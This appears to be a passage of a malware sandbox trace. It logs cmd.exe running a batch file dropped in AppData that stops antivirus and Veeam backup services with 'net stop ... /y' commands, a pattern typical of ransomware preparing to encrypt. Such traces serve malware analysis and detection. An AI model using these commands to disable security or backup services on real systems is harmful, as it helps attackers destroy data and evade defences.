Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0208.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.358] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.358] GetLastError () returned 0x2 [0208.358] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.358] GetLastError () returned 0x2 [0208.359] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0208.359] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0208.360] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.360] GetLastError () returned 0x2 [0208.360] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0208.360] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0208.361] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.361] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0208.361] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0208.361] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0208.361] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0208.361] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ntrtscan /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ntrtscan /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ntrtscan /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x9ec, dwThreadId=0xa00)) returned 1 [0208.365] CloseHandle (hObject=0x74) returned 1 [0208.366] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0208.366] GetProcessHeap () returned 0x3e0000 [0208.366] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.366] GetEnvironmentStringsW () returned 0x3f8408* [0208.366] GetProcessHeap () returned 0x3e0000 [0208.366] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.366] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.366] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0208.492] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0208.492] CloseHandle (hObject=0x78) returned 1 [0208.492] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0208.492] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0208.492] GetProcessHeap () returned 0x3e0000 [0208.492] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.492] GetEnvironmentStringsW () returned 0x3f8408* [0208.492] GetProcessHeap () returned 0x3e0000 [0208.492] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.493] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.493] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0208.493] GetProcessHeap () returned 0x3e0000 [0208.493] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.493] GetEnvironmentStringsW () returned 0x3f8408* [0208.493] GetProcessHeap () returned 0x3e0000 [0208.493] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.493] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.493] GetProcessHeap () returned 0x3e0000 [0208.493] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0208.493] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0208.493] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.493] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0208.493] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.493] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0208.493] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.493] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0208.494] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.494] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0208.494] SetConsoleInputExeNameW () returned 0x1 [0208.494] GetConsoleOutputCP () returned 0x1b5 [0208.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0208.494] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0208.494] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0208.494] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.495] SetFilePointer (in: hFile=0x78, lDistanceToMove=4458, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x116a [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0208.495] GetProcessHeap () returned 0x3e0000 [0208.495] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0208.495] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.495] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x116a [0208.495] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x757, lpOverlapped=0x0) returned 1 [0208.495] SetFilePointer (in: hFile=0x78, lDistanceToMove=4493, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x118d [0208.495] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=35, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$VEEAMSQL2012 /y\r\neΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 35 [0208.496] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.496] GetFileType (hFile=0x78) returned 0x1 [0208.496] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.496] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x118d [0208.496] GetProcessHeap () returned 0x3e0000 [0208.496] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0208.496] GetProcessHeap () returned 0x3e0000 [0208.496] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0208.499] _tell (_FileHandle=3) returned 4493 [0208.499] _close (_FileHandle=3) returned 0 [0208.499] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0208.500] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0208.500] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0208.500] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0208.500] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0208.500] _wcsicmp (_String1="net", _String2="CD") returned 11 [0208.500] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0208.500] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0208.500] _wcsicmp (_String1="net", _String2="REN") returned -4 [0208.500] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0208.500] _wcsicmp (_String1="net", _String2="SET") returned -5 [0208.500] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0208.500] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0208.500] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0208.500] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0208.500] _wcsicmp (_String1="net", _String2="MD") returned 1 [0208.500] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0208.500] _wcsicmp (_String1="net", _String2="RD") returned -4 [0208.500] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0208.500] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0208.500] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0208.500] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0208.500] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0208.500] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0208.500] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0208.500] _wcsicmp (_String1="net", _String2="VER") returned -8 [0208.500] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0208.500] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0208.500] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0208.500] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0208.500] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0208.500] _wcsicmp (_String1="net", _String2="START") returned -5 [0208.500] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0208.500] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0208.500] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0208.500] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0208.500] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0208.500] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0208.500] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0208.501] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0208.501] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0208.501] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0208.501] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0208.501] SetErrorMode (uMode=0x0) returned 0x1 [0208.501] GetProcessHeap () returned 0x3e0000 [0208.501] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0208.501] GetProcessHeap () returned 0x3e0000 [0208.501] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0208.501] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.502] GetProcessHeap () returned 0x3e0000 [0208.502] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0208.502] GetProcessHeap () returned 0x3e0000 [0208.502] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0208.502] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0208.502] GetProcessHeap () returned 0x3e0000 [0208.502] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0208.502] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.502] GetProcessHeap () returned 0x3e0000 [0208.502] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0208.502] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0208.502] GetProcessHeap () returned 0x3e0000 [0208.502] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0208.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.503] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.503] GetLastError () returned 0x2 [0208.504] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.504] GetLastError () returned 0x2 [0208.504] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.505] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.505] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.505] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.505] GetLastError () returned 0x2 [0208.506] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.506] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.506] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.506] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0208.506] SetErrorMode (uMode=0x0) returned 0x1 [0208.507] GetProcessHeap () returned 0x3e0000 [0208.507] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0208.507] GetProcessHeap () returned 0x3e0000 [0208.507] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0208.507] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.507] GetProcessHeap () returned 0x3e0000 [0208.507] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0208.507] GetProcessHeap () returned 0x3e0000 [0208.507] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0208.507] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0208.507] GetProcessHeap () returned 0x3e0000 [0208.507] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0208.508] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.508] GetProcessHeap () returned 0x3e0000 [0208.508] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0208.508] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0208.508] GetProcessHeap () returned 0x3e0000 [0208.508] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0208.508] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.509] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.509] GetLastError () returned 0x2 [0208.509] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.509] GetLastError () returned 0x2 [0208.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.510] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0208.510] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0208.511] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.511] GetLastError () returned 0x2 [0208.511] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0208.511] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0208.511] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.512] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0208.512] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0208.512] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0208.512] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0208.512] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$VEEAMSQL2012 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$VEEAMSQL2012 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$VEEAMSQL2012 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa14, dwThreadId=0x8d0)) returned 1 [0208.516] CloseHandle (hObject=0x78) returned 1 [0208.516] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0208.516] GetProcessHeap () returned 0x3e0000 [0208.516] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.516] GetEnvironmentStringsW () returned 0x3f8408* [0208.516] GetProcessHeap () returned 0x3e0000 [0208.516] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.517] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.517] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0208.648] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0208.649] CloseHandle (hObject=0x74) returned 1 [0208.649] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0208.649] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0208.649] GetProcessHeap () returned 0x3e0000 [0208.649] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.649] GetEnvironmentStringsW () returned 0x3f8408* [0208.649] GetProcessHeap () returned 0x3e0000 [0208.649] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.649] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.649] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0208.649] GetProcessHeap () returned 0x3e0000 [0208.649] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.649] GetEnvironmentStringsW () returned 0x3f8408* [0208.649] GetProcessHeap () returned 0x3e0000 [0208.649] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.649] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.649] GetProcessHeap () returned 0x3e0000 [0208.650] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0208.650] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0208.650] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.650] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0208.650] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.650] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0208.650] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.650] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0208.650] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.650] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0208.650] SetConsoleInputExeNameW () returned 0x1 [0208.650] GetConsoleOutputCP () returned 0x1b5 [0208.651] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0208.651] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.651] CreateFileW 